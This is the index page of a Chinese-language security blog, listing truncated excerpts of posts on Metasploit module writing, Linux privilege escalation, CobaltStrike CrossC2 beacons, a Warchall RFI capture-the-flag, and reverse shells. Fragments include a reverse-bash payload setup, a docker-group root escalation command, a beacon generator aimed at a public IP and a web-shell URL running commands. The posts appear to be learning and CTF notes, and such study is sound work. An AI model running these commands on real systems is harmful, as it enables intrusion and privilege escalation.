01-msf的exp模块 分为4个部分 class 定义类,导入的msf的类,叫mixins include 导入函数库 初始化,定义参数,模块的值 定义要执行的exp 如果语法写错了,可以在日志里看: /root/.msf4/logs/framework.log 写的demo,作用是调用tcp模块,进行ftp连接12345678910111213141516171819202122232425262728 2020-12-27 metasploit metasploit
02-建立一个新的session msf 建立一个新的sessionnew_session.rb作用是建立一个新的meterpreter session 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747 2020-12-26 metasploit metasploit
03-msf报错(SESSION may not be compatible) 起因:sudo -s提权在msf上一直报错,但是在靶机上是可以成功提权的。msf有一个模块,叫做post/multi/manage/sudo 看过这个模块的源码,就是使用sudo -s来提权的。 为什么会提权失败呢? 环境配置复现,debug设置msf监听handler -H 192.168.123.123 -P 6677 -p cmd/unix/reverse_bash 生成反弹shell的载荷 2020-12-22 metasploit metasploit
linux提权-msf提权插件编写中 linux提权-msf提权插件编写中 bob / secret docker组提权1docker run -v /:/linsecurity -i -t chrisfosterelli/rootplease nsf提权12345678910111213141516171819202122232425查看并挂载目录showmount -e 192.168.1.140mount 192.168.1.1 2020-12-19 linux linux
cobaltstrike的脚本(四) linux上线插件CrossC2录制的视频: CobaltStrike的插件 1234567891. src目录下,修改cna$CC2_PATH$CC2_BIN2. 添加证书.cobaltstrike.beacon_keys3. ./genCrossC2.Linux 18.163.137.185 6677 /root/tool/cobaltstrike/CrossC2-master/.cobalt 2020-12-12 cobaltstrike cobaltstrike
2021年学习计划 引子业精于勤荒于嬉,行成于思毁于随 开篇还有不到一个月,就要进入2021年了。废话不多说。总结一下去年计划完成情况,以及列一下2021年的学习计划。 2020年年度复盘2020年的上半年我是很闲的。众所周知的黑天鹅事件——一场温柔又致命的virus袭击了全球。在死亡人数到达百万之众的情况下,我还留着一条小命。不知道该不该感到庆幸。 总之还活着呢,最近几年也还要活下去。 2020计划考oscp,因为 2020-12-11 experience experience
Warchall Live RFI 远程文件包含 题目地址 访问http://rfi.warchall.net/。 web目录fuzz,以及index.php查看源码 远程命令执行漏洞查看文件123456789http://rfi.warchall.net/temp/payload.php?cmd=lsconf.txtindex.php.baklive_rfi.config.php.bakpayload.phpsol.php~sol.txtsol 2020-12-05 CTF CTF
linux内核升级&降级 引子这一切都要从开发不支持docker容器的检测开始说起…… 正文linux内核升级 下载deb安装包https://kernel.ubuntu.com/~kernel-ppa/mainline/v3.4-precise/ 执行安装 123456789cd /tmp/wget -c https://kernel.ubuntu.com/~kernel-ppa/mainline/v5.8/amd6 2020-11-30 linux linux
linux计划任务提权 123靶机地址ssh user@192.168.28.131password123 计划任务中的相对路径&绝对路径制作的视频教程:https://www.bilibili.com/video/BV1wA411Y79Q/ 12345678910#查看计划任务cat /etc/crontabcat #查找sh脚本find / -name "overwrite.sh" 2&g 2020-11-28 linux linux
linux反弹shell linux系统40多种不同类型的反弹shell linux比windows反弹shell的手法要多得多 msf的shellcode加载器msfvenommsfvenom -l payload |grep cmd/unix如何查找自己需要的shellcode类型 40多种linux反弹shell的手法 反弹shell攻击的防御 msfvenom一句话反弹shell12345678910 2020-11-13 linux linux